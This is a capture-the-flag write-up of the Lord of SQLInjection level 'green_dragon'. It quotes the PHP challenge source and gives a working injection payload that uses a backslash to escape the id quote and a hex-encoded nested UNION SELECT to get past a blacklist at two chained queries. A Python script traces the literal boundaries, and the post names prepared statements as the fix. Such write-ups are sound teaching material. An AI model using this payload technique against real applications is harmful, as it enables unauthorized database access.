
[ LOS ] Lord of SQLInjection No. 25 write-up (green_dragon)
sangjun
·2022. 1. 13. 23:30
Challenge source
query : select id,pw from prob_green_dragon where id='' and pw=''
<?php
include "./config.php";
login_chk();
$db = dbconnect();
if(preg_match('/prob|_|\.|\'|\"/i', $_GET[id])) exit("No Hack ~_~");
if(preg_match('/prob|_|\.|\'|\"/i', $_GET[pw])) exit("No Hack ~_~");
$query = "select id,pw from prob_green_dragon where id='{$_GET[id]}' and pw='{$_GET[pw]}'";
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if($result['id']){
    if(preg_match('/prob|_|\.|\'|\"/i', $result['id'])) exit("No Hack ~_~");
    if(preg_match('/prob|_|\.|\'|\"/i', $result['pw'])) exit("No Hack ~_~");
    $query2 = "select id from prob_green_dragon where id='{$result[id]}' and pw='{$result[pw]}'";
    echo "<hr>query2 : <strong>{$query2}</strong><hr><br>";
    $result = mysqli_fetch_array(mysqli_query($db,$query2));
    if($result['id'] == "admin") solve("green_dragon");
}
highlight_file(__FILE__);
?>
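Analysis and payload
1. Send \ as id. The filter has no rule for backslash, so it escapes the closing quote of id and everything up to pw=' is treated as part of the id string; pw is then parsed as SQL, and the payload is delivered there with union select. Quotes are filtered, so the returned row is written in hex: 0x5c is \, and the second value decodes to union select 0x61646d696e#, which repeats the same trick in query2 and returns admin (0x61646d696e).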
?id=\&pw=union%20select%200x5c,0x756e696f6e2073656c6563742030783631363436643639366523%23
2. Heads up: the difficulty rises sharply from here..
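Why the blacklist fails at both queries, as an added example that is not part of the original post: it rebuilds the two query strings from the challenge source and marks which bytes MySQL reads as string literal and which as SQL. The function names are hypothetical, and the scanner is a simplified model that assumes MySQL's default literal rules (backslash escapes, `''` as a quote, `#` comments).

```python
import re

# Blacklist copied from the challenge source; it has no rule for backslash.
FILTER = re.compile(r"prob|_|\.|'|\"", re.I)
# The payload from the write-up, URL-decoded (%20 -> space, %23 -> #).
PAGE_ID = "\\"
PAGE_PW = "union select 0x5c,0x756e696f6e2073656c6563742030783631363436643639366523##"

def build_query(cols, id_, pw):
    """Filter, then interpolate, as the challenge does for query and query2."""
    if any(FILTER.search(v) for v in (id_, pw)):
        raise ValueError("No Hack ~_~")
    return f"select {cols} from prob_green_dragon where id='{id_}' and pw='{pw}'"

def split_literals(sql):
    """Split SQL into (kind, text) parts: 'str', 'sql' or 'comment'.
    Simplified model (assumption): single-quoted strings and # comments only."""
    parts, buf, i, in_str = [], "", 0, False
    while i < len(sql):
        c = sql[i]
        if in_str and (c == "\\" or sql[i:i + 2] == "''"):
            buf += sql[i:i + 2]          # escaped character stays inside the literal
            i += 2
            continue
        if c == "#" and not in_str:      # rest of the line is a comment
            return parts + [("sql", buf), ("comment", sql[i:])]
        if c == "'":                     # unescaped quote toggles string state
            parts.append(("str" if in_str else "sql", buf))
            buf, in_str = "", not in_str
        else:
            buf += c
        i += 1
    return parts + [("str" if in_str else "sql", buf)]

def literals(sql):
    """Only the parts MySQL would treat as string data."""
    return [text for kind, text in split_literals(sql) if kind == "str"]

def hex_columns(sql_text):
    """Decode the 0x... literals, i.e. the row the UNION branch returns."""
    return [bytes.fromhex(h).decode() for h in re.findall(r"0x([0-9a-fA-F]+)", sql_text)]

if __name__ == "__main__":
    q1 = build_query("id,pw", PAGE_ID, PAGE_PW)
    print(split_literals(q1))            # id literal swallows "' and pw="
    row_id, row_pw = hex_columns(split_literals(q1)[2][1])
    print(split_literals(build_query("id", row_id, row_pw)))  # same shift in query2
```

Binding id and pw as parameters of a prepared statement in both queries keeps the values out of the SQL text, so no character in them can move a literal boundary.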